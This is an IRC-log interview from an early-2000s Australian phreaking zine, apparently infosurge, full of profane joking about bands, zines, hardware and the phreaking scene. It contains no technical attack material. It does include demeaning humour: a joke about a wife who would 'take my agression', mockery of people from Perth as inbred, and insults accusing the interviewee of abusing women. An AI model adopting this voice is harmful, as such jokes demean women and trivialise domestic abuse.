: <zak> hmm... band
: <zak> that's a tough question
: <Fleabag> Just answer it.
: <zak> i really like that royal crown revue band
: <zak> they make good music
: <zak> whenever im down i can listen to it
: <zak> and laugh my arse off at their shitness
: <zak> so the answer is red hot chili peppers
:
: <Fleabag> Are you single? Uhhh, you don't have to bother answering that
: one....
: <zak> moving on...
:
: <Fleabag> Do you think the au phreaking scene is dead?
: <zak> in a way
: <zak> there isn't really much new innovation
: <zak> im just in it for the groupie chicks
: <Fleabag> Aren't we all?
: <zak> as you can tell, its working
:
: <Fleabag> Favorite zine? (Besides infosurge?)
: <zak> umm
: <zak> let me think for a bit
: <zak> actually, i have to go for a piss
: <zak> back in a few
: <Fleabag> Okay, I'm going to get another beer.
: <Fleabag> Damn phase, does it always take you that long to piss?
: (Seriously, its been over 10 minutes)
: <Fleabag> Maybe you should see a doctor?
: <zak> stfu
: <zak> umm.. no favourite really
: <zak> used to like um
: <zak> phrack, thtj, fk
: <zak> and the exploit-x issue 1
: <zak> was krad
: <Fleabag> So I heard...
: <zak> and what do you mean 'other than infosurge'?
: <zak> i wouldnt say that trash is my favourite
: <Fleabag> I'm asking the questions here.
:
: <Fleabag> If you could be any member of the infosurge crew, who would you
: be?
: <zak> that phase5 guy
: <zak> he's cool
: <zak> other than that
: <zak> i'd be k
: <zak> he puts the k in krad
: <Fleabag> We all want to be k.
:
: <Fleabag> Current hardware setup?
: <zak> umm hardware
: <zak> this computer
: <zak> the other one next to it
: <zak> the 2 386's i hide alcohol in
: <zak> the p166 i hide alcohol in
: <zak> umm
: <zak> the 386 is called woody
: <zak> and it has a can of woodstock in it
: <zak> thats irony
: <zak> or something similar to that
: <zak> got a dumb terminal as well
: <zak> and a phone shaped like a football
:
: <Fleabag> Who do you think I should interview next? And why?
: <zak> not lymco
: <zak> he's from perth
: <zak> all his answers will be
: <zak> 'yes i want to fuck my relatives'
: <zak> and
: <zak> 'no.. no electricity yet'
: <Fleabag> Whos the most interesting person you've ever met online?
: <zak> and 'fuck cant talk now. uncle jed needs me to backhoe the lawn
: <zak> herm
: <zak> slow down
: <zak> with the questions
: <Fleabag> stfu
: <zak> i like to rant
: <Fleabag> I'll do what I want, and I'll fix it up all neat and shit.
: <Fleabag> Rant away.
: <zak> ok
: <zak> pants
: <zak> why are they so important
: <zak> i dont wear them most of the time
: <zak> someone explain
: <Fleabag> Are you quite done?
: <zak> for now
:
: <Fleabag> Whos the most interesting person you've ever met online?
: <zak> umm, most interesting person
: <zak> i dont know
: <zak> your kind of a weirdo
: <zak> could be you
: <zak> coolest person i met online
: <zak> doesnt irc tho
: <zak> so that probably doesnt count
: <Fleabag> I asked for a name. Not your life story.
: <zak> i'll come back to it later
: <Fleabag> Okay..
:
: <Fleabag> If you could be any type of smell, what would you be and why?
: <zak> umm
: <zak> you know the smell of nutsaq?
: <zak> not that
: <zak> something to pickup chicks
: <zak> so the smell of a stollie
:
: <Fleabag> Favorite site?
: <zak> its a porn site
: <zak> so i'll give you second favourite
: <zak> i dont want everyone using its bandwidth
: <zak> oh shit, phone beeped
: <zak> wait up
: <zak> wtf
: <zak> thesefucks
: <zak> are messaging me
: <zak> calling me "jen"
: <zak> and saying we had a great night last night
: <zak> this is the second time
: <zak> in a week
: <zak> this has happened
: <zak> this is fucked
: <Fleabag> Do you really think the people reading IS care?
: <zak> thats not the fucking point
: <Fleabag> Just answer my questions and crawl back into your hole.
: <zak> what was the question again?
: <zak> oh
: <zak> www.theonion.com
:
: <Fleabag> If you could be a chick for one day, whats the first thing you
: would do?
: <zak> are you stealing questions
: <zak> from picturepoll.com
: <zak> thats fucking sad
: <zak> what kind of bullshit interview is this
: <Fleabag> No. I am not.
: <Fleabag> Answer the fucking question.
: <zak> if i was a chick for a day
: <zak> i'd marry myself
: <zak> so the next day
: <zak> i'd have achick
: <zak> to cook, clean and take my agression
:
: <Fleabag> Do you think I'm fat?
: <zak> in those pants? yes
:
: <Fleabag> Thoughts on Project K?
: <zak> project k demands bananas
:
: <Fleabag> Have you ever spoken to the devil?
: <zak> no
: <zak> he once felt me up on the bus tho
: <zak> but i ignored him
:
: <Fleabag> Ever woken up screaming 'Oh god, what happened to my penis?!!'?
: <zak> yes
: <zak> several times
:
: <Fleabag> Know where I can get some 0day pr0n action?
: <zak> www.thehun.net
: <zak> has 0hday
: <zak> i have others
: <zak> but i dont give out my secrets
: <Fleabag> phase5 thanks for you time, I'll ask you one more question...
: <zak> ok
:
: <Fleabag> I haven't got anywhere to stay tonight, reckon I could crash at
: your place?
: <zak> im sleeping at the park tonight. you're welcome to join me
: <Fleabag> Thank you phase5. Your thoughts will forever live on in
: infosurge8....... you fucking sad little weirdo...
: <zak> guess what
: <Fleabag> What?
: <zak> im removing your midget monkey article from is7
: <zak> you fuck
: <Fleabag> I hate you.
: <zak> eric?
: <zak> is that you?
: <Fleabag> Pablo?
: <zak> yes
: <zak> its me
: <Fleabag> One more thing zak....
: <zak> yes?
: <Fleabag> <zak> i'll come back to it later
: <Fleabag> The people deserve to know.
: <zak> what was the question?
: <Fleabag> Whos the most interesting person you've ever met online?
: <zak> there's no-one really
: <zak> that stands out as really interesting
: <zak> not on irc anyway
: <Fleabag> You said you come back to it, the coolest person.
: <zak> coolest?
: <zak> me
: <Fleabag> Stop being a tight fuck, its your fucking zine, name names.
: <zak> OK FUCK
: <zak> LOOK
: <zak> NO ONE IS FUCKING INTERESTING
: <zak> YOUR NOT COOL
: <zak> YOUR SAD FUCKS WITH NO LIVES
: <zak> i have met one krad person on icq tho
: <Fleabag> Who was?
: <zak> and here ends interview
: <Fleabag> Shit, you really are an alco huh? Please note, phase is hanging to
: get to the park to drink alone.
: <zak> fucking yes
: <zak> its 12:00
: <zak> i want to go
: <zak> spend time with jim
: <zak> my friend
: <zak> leave me alone
: <zak> blur my fucking face
: <zak> blur it
:
: -In conclusion-
:
: phase5 is a creepy little man. He's the type of person who, if you saw him
: walking towards you on the street, you'd cross the road to avoid. His
: pastimes include drinking alone in parks, abusing women and masturbating
: over old #phreak logs. He has a habit of asking people for money and soiled
: panties. Once upon a time, there was a guy who went well at school, knew
: the secrets of au phreaking; now stands a dirty pervert who spends whatever
: money he makes on alcohol. On the Fleabag Human Rating System (TM) I give
: phase5 3/10. All three points are for jokes made about lymco's mother that
: I found somewhat amusing.
:
: Fleabag. 8/12/00
:
:.....................................................
:
:
[ ]
e o f
